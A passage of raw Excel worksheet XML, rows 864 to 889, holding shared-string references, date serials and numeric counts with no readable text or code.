        <v>21</v>
      </c>
      <c r="L864" t="s">
        <v>77</v>
      </c>
      <c r="M864" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N864" t="s">
        <v>159</v>
      </c>
      <c r="Q864" s="95" t="s">
        <v>2728</v>
      </c>
      <c r="R864">
        <v>19235</v>
      </c>
      <c r="S864">
        <v>18368</v>
      </c>
      <c r="T864">
        <v>16361</v>
      </c>
      <c r="U864">
        <v>17012</v>
      </c>
      <c r="V864">
        <v>18560</v>
      </c>
      <c r="W864" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="865" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A865" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B865" s="52">
        <v>44383.478941574074</v>
      </c>
      <c r="C865" s="95" t="s">
        <v>2729</v>
      </c>
      <c r="D865" s="96">
        <v>100</v>
      </c>
      <c r="E865" s="95" t="s">
        <v>2730</v>
      </c>
      <c r="F865" s="42">
        <v>100</v>
      </c>
      <c r="G865" s="95" t="s">
        <v>2731</v>
      </c>
      <c r="H865" t="s">
        <v>2732</v>
      </c>
      <c r="I865" t="s">
        <v>75</v>
      </c>
      <c r="J865" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K865" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L865" t="s">
        <v>77</v>
      </c>
      <c r="M865" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N865" t="s">
        <v>159</v>
      </c>
      <c r="Q865" s="95" t="s">
        <v>2733</v>
      </c>
      <c r="S865">
        <v>7573</v>
      </c>
      <c r="T865">
        <v>1404</v>
      </c>
      <c r="U865">
        <v>4531</v>
      </c>
      <c r="V865">
        <v>19991</v>
      </c>
      <c r="W865" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="866" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A866" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B866" s="52">
        <v>44375.762945532406</v>
      </c>
      <c r="C866" s="95" t="s">
        <v>2734</v>
      </c>
      <c r="D866" s="96">
        <v>101</v>
      </c>
      <c r="E866" s="95" t="s">
        <v>2735</v>
      </c>
      <c r="F866" s="42">
        <v>101</v>
      </c>
      <c r="G866" s="95" t="s">
        <v>2736</v>
      </c>
      <c r="H866" t="s">
        <v>2737</v>
      </c>
      <c r="I866" t="s">
        <v>75</v>
      </c>
      <c r="J866" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K866" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L866" t="s">
        <v>77</v>
      </c>
      <c r="M866" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N866" t="s">
        <v>159</v>
      </c>
      <c r="O866" s="95" t="s">
        <v>2738</v>
      </c>
      <c r="Q866" s="95" t="s">
        <v>2739</v>
      </c>
      <c r="V866">
        <v>22</v>
      </c>
      <c r="W866" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="867" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A867" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B867" s="52">
        <v>44375.762945567127</v>
      </c>
      <c r="C867" s="95" t="s">
        <v>2734</v>
      </c>
      <c r="D867" s="96">
        <v>101</v>
      </c>
      <c r="E867" s="95" t="s">
        <v>2740</v>
      </c>
      <c r="F867" s="42">
        <v>110</v>
      </c>
      <c r="G867" s="95" t="s">
        <v>2741</v>
      </c>
      <c r="H867" t="s">
        <v>2742</v>
      </c>
      <c r="I867" t="s">
        <v>75</v>
      </c>
      <c r="J867" s="95" t="s">
        <v>236</v>
      </c>
      <c r="K867" s="95" t="s">
        <v>21</v>
      </c>
      <c r="L867" t="s">
        <v>77</v>
      </c>
      <c r="M867" s="95" t="s">
        <v>158</v>
      </c>
      <c r="N867" t="s">
        <v>159</v>
      </c>
      <c r="O867" s="95" t="s">
        <v>2743</v>
      </c>
      <c r="Q867" s="95" t="s">
        <v>2739</v>
      </c>
      <c r="U867">
        <v>5</v>
      </c>
      <c r="W867" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="868" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A868" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B868" s="52">
        <v>43985.648306261573</v>
      </c>
      <c r="C868" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D868" s="96">
        <v>124</v>
      </c>
      <c r="E868" s="95" t="s">
        <v>2745</v>
      </c>
      <c r="F868" s="42">
        <v>104</v>
      </c>
      <c r="G868" s="95" t="s">
        <v>2746</v>
      </c>
      <c r="H868" t="s">
        <v>2747</v>
      </c>
      <c r="I868" t="s">
        <v>103</v>
      </c>
      <c r="J868" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K868" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L868" t="s">
        <v>83</v>
      </c>
      <c r="M868" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N868" t="s">
        <v>149</v>
      </c>
      <c r="P868" t="s">
        <v>2748</v>
      </c>
      <c r="Q868" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R868">
        <v>178</v>
      </c>
      <c r="S868">
        <v>181</v>
      </c>
      <c r="T868">
        <v>1721</v>
      </c>
      <c r="U868">
        <v>3182</v>
      </c>
      <c r="V868">
        <v>4031</v>
      </c>
      <c r="W868" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="869" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A869" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B869" s="52">
        <v>43908.853579537034</v>
      </c>
      <c r="C869" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D869" s="96">
        <v>124</v>
      </c>
      <c r="E869" s="95" t="s">
        <v>2750</v>
      </c>
      <c r="F869" s="42">
        <v>102</v>
      </c>
      <c r="G869" s="95" t="s">
        <v>2751</v>
      </c>
      <c r="H869" t="s">
        <v>2752</v>
      </c>
      <c r="I869" t="s">
        <v>103</v>
      </c>
      <c r="J869" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K869" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L869" t="s">
        <v>83</v>
      </c>
      <c r="M869" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N869" t="s">
        <v>149</v>
      </c>
      <c r="P869" t="s">
        <v>2748</v>
      </c>
      <c r="Q869" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R869">
        <v>3</v>
      </c>
      <c r="S869">
        <v>8</v>
      </c>
      <c r="T869">
        <v>899</v>
      </c>
      <c r="U869">
        <v>1514</v>
      </c>
      <c r="V869">
        <v>2345</v>
      </c>
      <c r="W869" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="870" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A870" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B870" s="52">
        <v>43908.853579606483</v>
      </c>
      <c r="C870" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D870" s="96">
        <v>124</v>
      </c>
      <c r="E870" s="95" t="s">
        <v>2753</v>
      </c>
      <c r="F870" s="42">
        <v>102</v>
      </c>
      <c r="G870" s="95" t="s">
        <v>2754</v>
      </c>
      <c r="H870" t="s">
        <v>2755</v>
      </c>
      <c r="I870" t="s">
        <v>103</v>
      </c>
      <c r="J870" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K870" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L870" t="s">
        <v>83</v>
      </c>
      <c r="M870" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N870" t="s">
        <v>149</v>
      </c>
      <c r="P870" t="s">
        <v>2748</v>
      </c>
      <c r="Q870" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R870">
        <v>3</v>
      </c>
      <c r="T870">
        <v>874</v>
      </c>
      <c r="U870">
        <v>1440</v>
      </c>
      <c r="V870">
        <v>2305</v>
      </c>
      <c r="W870" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="871" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A871" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B871" s="52">
        <v>43889.707511701388</v>
      </c>
      <c r="C871" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D871" s="96">
        <v>124</v>
      </c>
      <c r="E871" s="95" t="s">
        <v>2756</v>
      </c>
      <c r="F871" s="42">
        <v>102</v>
      </c>
      <c r="G871" s="95" t="s">
        <v>2757</v>
      </c>
      <c r="H871" t="s">
        <v>2758</v>
      </c>
      <c r="I871" t="s">
        <v>103</v>
      </c>
      <c r="J871" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K871" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L871" t="s">
        <v>83</v>
      </c>
      <c r="M871" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N871" t="s">
        <v>149</v>
      </c>
      <c r="P871" t="s">
        <v>2748</v>
      </c>
      <c r="Q871" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R871">
        <v>3</v>
      </c>
      <c r="S871">
        <v>1</v>
      </c>
      <c r="T871">
        <v>886</v>
      </c>
      <c r="U871">
        <v>1457</v>
      </c>
      <c r="V871">
        <v>1519</v>
      </c>
      <c r="W871" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="872" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A872" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B872" s="52">
        <v>43908.853579629627</v>
      </c>
      <c r="C872" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D872" s="96">
        <v>124</v>
      </c>
      <c r="E872" s="95" t="s">
        <v>2759</v>
      </c>
      <c r="F872" s="42">
        <v>102</v>
      </c>
      <c r="G872" s="95" t="s">
        <v>2760</v>
      </c>
      <c r="H872" t="s">
        <v>2761</v>
      </c>
      <c r="I872" t="s">
        <v>103</v>
      </c>
      <c r="J872" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K872" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L872" t="s">
        <v>83</v>
      </c>
      <c r="M872" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N872" t="s">
        <v>149</v>
      </c>
      <c r="P872" t="s">
        <v>2748</v>
      </c>
      <c r="Q872" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R872">
        <v>49</v>
      </c>
      <c r="S872">
        <v>62</v>
      </c>
      <c r="T872">
        <v>1144</v>
      </c>
      <c r="U872">
        <v>2098</v>
      </c>
      <c r="V872">
        <v>2827</v>
      </c>
      <c r="W872" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="873" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A873" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B873" s="52">
        <v>43908.853579479168</v>
      </c>
      <c r="C873" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D873" s="96">
        <v>124</v>
      </c>
      <c r="E873" s="95" t="s">
        <v>2762</v>
      </c>
      <c r="F873" s="42">
        <v>103</v>
      </c>
      <c r="G873" s="95" t="s">
        <v>2763</v>
      </c>
      <c r="H873" t="s">
        <v>2764</v>
      </c>
      <c r="I873" t="s">
        <v>103</v>
      </c>
      <c r="J873" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K873" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L873" t="s">
        <v>83</v>
      </c>
      <c r="M873" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N873" t="s">
        <v>149</v>
      </c>
      <c r="P873" t="s">
        <v>2748</v>
      </c>
      <c r="Q873" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R873">
        <v>29</v>
      </c>
      <c r="S873">
        <v>21</v>
      </c>
      <c r="T873">
        <v>1002</v>
      </c>
      <c r="U873">
        <v>1787</v>
      </c>
      <c r="V873">
        <v>2531</v>
      </c>
      <c r="W873" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="874" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A874" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B874" s="52">
        <v>43889.707511782406</v>
      </c>
      <c r="C874" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D874" s="96">
        <v>124</v>
      </c>
      <c r="E874" s="95" t="s">
        <v>2765</v>
      </c>
      <c r="F874" s="42">
        <v>101</v>
      </c>
      <c r="G874" s="95" t="s">
        <v>2766</v>
      </c>
      <c r="H874" t="s">
        <v>2767</v>
      </c>
      <c r="I874" t="s">
        <v>103</v>
      </c>
      <c r="J874" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K874" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L874" t="s">
        <v>83</v>
      </c>
      <c r="M874" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N874" t="s">
        <v>149</v>
      </c>
      <c r="P874" t="s">
        <v>2748</v>
      </c>
      <c r="Q874" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R874">
        <v>7</v>
      </c>
      <c r="S874">
        <v>8</v>
      </c>
      <c r="T874">
        <v>932</v>
      </c>
      <c r="U874">
        <v>1490</v>
      </c>
      <c r="V874">
        <v>2344</v>
      </c>
      <c r="W874" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="875" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A875" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B875" s="52">
        <v>43908.853579571762</v>
      </c>
      <c r="C875" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D875" s="96">
        <v>124</v>
      </c>
      <c r="E875" s="95" t="s">
        <v>2768</v>
      </c>
      <c r="F875" s="42">
        <v>102</v>
      </c>
      <c r="G875" s="95" t="s">
        <v>2769</v>
      </c>
      <c r="H875" t="s">
        <v>2770</v>
      </c>
      <c r="I875" t="s">
        <v>103</v>
      </c>
      <c r="J875" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K875" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L875" t="s">
        <v>83</v>
      </c>
      <c r="M875" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N875" t="s">
        <v>149</v>
      </c>
      <c r="P875" t="s">
        <v>2748</v>
      </c>
      <c r="Q875" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R875">
        <v>12</v>
      </c>
      <c r="S875">
        <v>34</v>
      </c>
      <c r="T875">
        <v>917</v>
      </c>
      <c r="U875">
        <v>1633</v>
      </c>
      <c r="V875">
        <v>2474</v>
      </c>
      <c r="W875" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="876" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A876" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B876" s="52">
        <v>43889.707511875</v>
      </c>
      <c r="C876" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D876" s="96">
        <v>124</v>
      </c>
      <c r="E876" s="95" t="s">
        <v>2771</v>
      </c>
      <c r="F876" s="42">
        <v>101</v>
      </c>
      <c r="G876" s="95" t="s">
        <v>2772</v>
      </c>
      <c r="H876" t="s">
        <v>2773</v>
      </c>
      <c r="I876" t="s">
        <v>103</v>
      </c>
      <c r="J876" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K876" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L876" t="s">
        <v>83</v>
      </c>
      <c r="M876" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N876" t="s">
        <v>149</v>
      </c>
      <c r="P876" t="s">
        <v>2748</v>
      </c>
      <c r="Q876" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="S876">
        <v>4</v>
      </c>
      <c r="T876">
        <v>880</v>
      </c>
      <c r="U876">
        <v>1444</v>
      </c>
      <c r="V876">
        <v>1509</v>
      </c>
      <c r="W876" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="877" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A877" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B877" s="52">
        <v>43889.707511840279</v>
      </c>
      <c r="C877" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D877" s="96">
        <v>124</v>
      </c>
      <c r="E877" s="95" t="s">
        <v>2774</v>
      </c>
      <c r="F877" s="42">
        <v>101</v>
      </c>
      <c r="G877" s="95" t="s">
        <v>2775</v>
      </c>
      <c r="H877" t="s">
        <v>2776</v>
      </c>
      <c r="I877" t="s">
        <v>103</v>
      </c>
      <c r="J877" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K877" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L877" t="s">
        <v>83</v>
      </c>
      <c r="M877" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N877" t="s">
        <v>149</v>
      </c>
      <c r="P877" t="s">
        <v>2748</v>
      </c>
      <c r="Q877" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="R877">
        <v>43</v>
      </c>
      <c r="S877">
        <v>112</v>
      </c>
      <c r="T877">
        <v>1165</v>
      </c>
      <c r="U877">
        <v>2296</v>
      </c>
      <c r="V877">
        <v>3012</v>
      </c>
      <c r="W877" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="878" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A878" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B878" s="52">
        <v>43908.853579502313</v>
      </c>
      <c r="C878" s="95" t="s">
        <v>2744</v>
      </c>
      <c r="D878" s="96">
        <v>124</v>
      </c>
      <c r="E878" s="95" t="s">
        <v>2777</v>
      </c>
      <c r="F878" s="42">
        <v>102</v>
      </c>
      <c r="G878" s="95" t="s">
        <v>2778</v>
      </c>
      <c r="H878" t="s">
        <v>2779</v>
      </c>
      <c r="I878" t="s">
        <v>103</v>
      </c>
      <c r="J878" s="95" t="s">
        <v>147</v>
      </c>
      <c r="K878" s="95" t="s">
        <v>35</v>
      </c>
      <c r="L878" t="s">
        <v>83</v>
      </c>
      <c r="M878" s="95" t="s">
        <v>148</v>
      </c>
      <c r="N878" t="s">
        <v>149</v>
      </c>
      <c r="P878" t="s">
        <v>2748</v>
      </c>
      <c r="Q878" s="95" t="s">
        <v>2749</v>
      </c>
      <c r="T878">
        <v>872</v>
      </c>
      <c r="U878">
        <v>1440</v>
      </c>
      <c r="V878">
        <v>2298</v>
      </c>
      <c r="W878" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="879" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A879" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B879" s="52">
        <v>44065.723533958335</v>
      </c>
      <c r="C879" s="95" t="s">
        <v>2780</v>
      </c>
      <c r="D879" s="96">
        <v>132</v>
      </c>
      <c r="E879" s="95" t="s">
        <v>2781</v>
      </c>
      <c r="F879" s="42">
        <v>120</v>
      </c>
      <c r="G879" s="95" t="s">
        <v>2782</v>
      </c>
      <c r="H879" t="s">
        <v>2783</v>
      </c>
      <c r="I879" t="s">
        <v>17</v>
      </c>
      <c r="J879" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K879" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L879" t="s">
        <v>83</v>
      </c>
      <c r="M879" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q879" s="95" t="s">
        <v>2784</v>
      </c>
      <c r="W879" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="880" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A880" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B880" s="52">
        <v>44312.610072280091</v>
      </c>
      <c r="C880" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D880" s="96">
        <v>110</v>
      </c>
      <c r="E880" s="95" t="s">
        <v>2786</v>
      </c>
      <c r="F880" s="42">
        <v>210</v>
      </c>
      <c r="G880" s="95" t="s">
        <v>2782</v>
      </c>
      <c r="H880" t="s">
        <v>1074</v>
      </c>
      <c r="I880" t="s">
        <v>17</v>
      </c>
      <c r="J880" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K880" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L880" t="s">
        <v>83</v>
      </c>
      <c r="M880" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q880" s="95" t="s">
        <v>2787</v>
      </c>
      <c r="S880">
        <v>1</v>
      </c>
      <c r="T880">
        <v>1</v>
      </c>
      <c r="U880">
        <v>3</v>
      </c>
      <c r="V880">
        <v>2</v>
      </c>
      <c r="W880" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="881" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A881" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B881" s="52">
        <v>44602.796026724536</v>
      </c>
      <c r="C881" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D881" s="96">
        <v>230</v>
      </c>
      <c r="E881" s="95" t="s">
        <v>2786</v>
      </c>
      <c r="F881" s="42">
        <v>243</v>
      </c>
      <c r="G881" s="95" t="s">
        <v>2782</v>
      </c>
      <c r="H881" t="s">
        <v>2788</v>
      </c>
      <c r="I881" t="s">
        <v>17</v>
      </c>
      <c r="J881" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K881" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L881" t="s">
        <v>83</v>
      </c>
      <c r="M881" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q881" s="95" t="s">
        <v>161</v>
      </c>
      <c r="S881">
        <v>1</v>
      </c>
      <c r="T881">
        <v>1</v>
      </c>
      <c r="U881">
        <v>3</v>
      </c>
      <c r="V881">
        <v>2</v>
      </c>
      <c r="W881" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="882" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A882" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B882" s="52">
        <v>44602.796026666663</v>
      </c>
      <c r="C882" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D882" s="96">
        <v>110</v>
      </c>
      <c r="E882" s="95" t="s">
        <v>2789</v>
      </c>
      <c r="F882" s="42">
        <v>100</v>
      </c>
      <c r="G882" s="95" t="s">
        <v>2790</v>
      </c>
      <c r="H882" t="s">
        <v>2791</v>
      </c>
      <c r="I882" t="s">
        <v>17</v>
      </c>
      <c r="J882" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K882" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L882" t="s">
        <v>83</v>
      </c>
      <c r="M882" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q882" s="95" t="s">
        <v>2787</v>
      </c>
      <c r="S882">
        <v>125</v>
      </c>
      <c r="T882">
        <v>363</v>
      </c>
      <c r="U882">
        <v>350</v>
      </c>
      <c r="V882">
        <v>2534</v>
      </c>
      <c r="W882" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="883" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A883" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B883" s="52">
        <v>44312.610072337964</v>
      </c>
      <c r="C883" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D883" s="96">
        <v>230</v>
      </c>
      <c r="E883" s="95" t="s">
        <v>2789</v>
      </c>
      <c r="F883" s="42">
        <v>203</v>
      </c>
      <c r="G883" s="95" t="s">
        <v>2790</v>
      </c>
      <c r="H883" t="s">
        <v>2791</v>
      </c>
      <c r="I883" t="s">
        <v>17</v>
      </c>
      <c r="J883" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K883" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L883" t="s">
        <v>83</v>
      </c>
      <c r="M883" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q883" s="95" t="s">
        <v>161</v>
      </c>
      <c r="S883">
        <v>125</v>
      </c>
      <c r="T883">
        <v>363</v>
      </c>
      <c r="U883">
        <v>350</v>
      </c>
      <c r="V883">
        <v>2534</v>
      </c>
      <c r="W883" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="884" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A884" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B884" s="52">
        <v>44065.723533912038</v>
      </c>
      <c r="C884" s="95" t="s">
        <v>2780</v>
      </c>
      <c r="D884" s="96">
        <v>132</v>
      </c>
      <c r="E884" s="95" t="s">
        <v>2792</v>
      </c>
      <c r="F884" s="42">
        <v>110</v>
      </c>
      <c r="G884" s="95" t="s">
        <v>2793</v>
      </c>
      <c r="H884" t="s">
        <v>2783</v>
      </c>
      <c r="I884" t="s">
        <v>17</v>
      </c>
      <c r="J884" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K884" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L884" t="s">
        <v>83</v>
      </c>
      <c r="M884" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q884" s="95" t="s">
        <v>2784</v>
      </c>
      <c r="W884" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="885" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A885" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B885" s="52">
        <v>44602.796026597221</v>
      </c>
      <c r="C885" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D885" s="96">
        <v>110</v>
      </c>
      <c r="E885" s="95" t="s">
        <v>2794</v>
      </c>
      <c r="F885" s="42">
        <v>200</v>
      </c>
      <c r="G885" s="95" t="s">
        <v>2793</v>
      </c>
      <c r="H885" t="s">
        <v>2795</v>
      </c>
      <c r="I885" t="s">
        <v>17</v>
      </c>
      <c r="J885" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K885" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L885" t="s">
        <v>83</v>
      </c>
      <c r="M885" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q885" s="95" t="s">
        <v>2787</v>
      </c>
      <c r="R885">
        <v>10475</v>
      </c>
      <c r="S885">
        <v>10354</v>
      </c>
      <c r="T885">
        <v>10126</v>
      </c>
      <c r="U885">
        <v>12820</v>
      </c>
      <c r="V885">
        <v>11459</v>
      </c>
      <c r="W885" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="886" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A886" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B886" s="52">
        <v>44312.610072303243</v>
      </c>
      <c r="C886" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D886" s="96">
        <v>230</v>
      </c>
      <c r="E886" s="95" t="s">
        <v>2794</v>
      </c>
      <c r="F886" s="42">
        <v>214</v>
      </c>
      <c r="G886" s="95" t="s">
        <v>2793</v>
      </c>
      <c r="H886" t="s">
        <v>1074</v>
      </c>
      <c r="I886" t="s">
        <v>17</v>
      </c>
      <c r="J886" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K886" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L886" t="s">
        <v>83</v>
      </c>
      <c r="M886" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q886" s="95" t="s">
        <v>161</v>
      </c>
      <c r="R886">
        <v>10475</v>
      </c>
      <c r="S886">
        <v>10354</v>
      </c>
      <c r="T886">
        <v>10126</v>
      </c>
      <c r="U886">
        <v>12820</v>
      </c>
      <c r="V886">
        <v>11459</v>
      </c>
      <c r="W886" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="887" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A887" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B887" s="52">
        <v>44065.723533888886</v>
      </c>
      <c r="C887" s="95" t="s">
        <v>2780</v>
      </c>
      <c r="D887" s="96">
        <v>132</v>
      </c>
      <c r="E887" s="95" t="s">
        <v>2796</v>
      </c>
      <c r="F887" s="42">
        <v>110</v>
      </c>
      <c r="G887" s="95" t="s">
        <v>2797</v>
      </c>
      <c r="H887" t="s">
        <v>2798</v>
      </c>
      <c r="I887" t="s">
        <v>17</v>
      </c>
      <c r="J887" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K887" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L887" t="s">
        <v>83</v>
      </c>
      <c r="M887" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q887" s="95" t="s">
        <v>2784</v>
      </c>
      <c r="W887" t="s">
        <v>208</v>
      </c>
    </row>
    <row r="888" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A888" s="95" t="s">
        <v>4</v>
      </c>
      <c r="B888" s="52">
        <v>44602.79602671296</v>
      </c>
      <c r="C888" s="95" t="s">
        <v>2785</v>
      </c>
      <c r="D888" s="96">
        <v>230</v>
      </c>
      <c r="E888" s="95" t="s">
        <v>2799</v>
      </c>
      <c r="F888" s="42">
        <v>114</v>
      </c>
      <c r="G888" s="95" t="s">
        <v>2797</v>
      </c>
      <c r="H888" t="s">
        <v>2800</v>
      </c>
      <c r="I888" t="s">
        <v>17</v>
      </c>
      <c r="J888" s="95" t="s">
        <v>1412</v>
      </c>
      <c r="K888" s="95" t="s">
        <v>17</v>
      </c>
      <c r="L888" t="s">
        <v>83</v>
      </c>
      <c r="M888" s="95" t="s">
        <v>72</v>
      </c>
      <c r="Q888" s="95" t="s">
        <v>2787</v>
      </c>
      <c r="R888">
        <v>118412</v>
      </c>
      <c r="S888">
        <v>101479</v>
      </c>
      <c r="T888">
        <v>96317</v>
      </c>
      <c r="U888">
        <v>118536</v>
      </c>
      <c r="V888">
        <v>109208</v>
      </c>
      <c r="W888" t="s">
        <v>95</v>
      </c>
    </row>
    <row r="889" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A889" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B889" s="52">
        <v>44065.723533842596</v>
      </c>
      <c r="C889" s="95" t="s">
        <v>2780</v>
      </c>
      <c r="D889" s="96">
        <v>132</v>
      </c>
      <c r="E889" s="95" t="s">
        <v>2801</v>
      </c>
      <c r="F889" s="42">
        <v>110</v>
      </c>
      <c r="G889" s="95" t="s">
        <v>2802</v>
      </c>
      <c r="H889" t="s">
        <v>2783</v>
      </c>
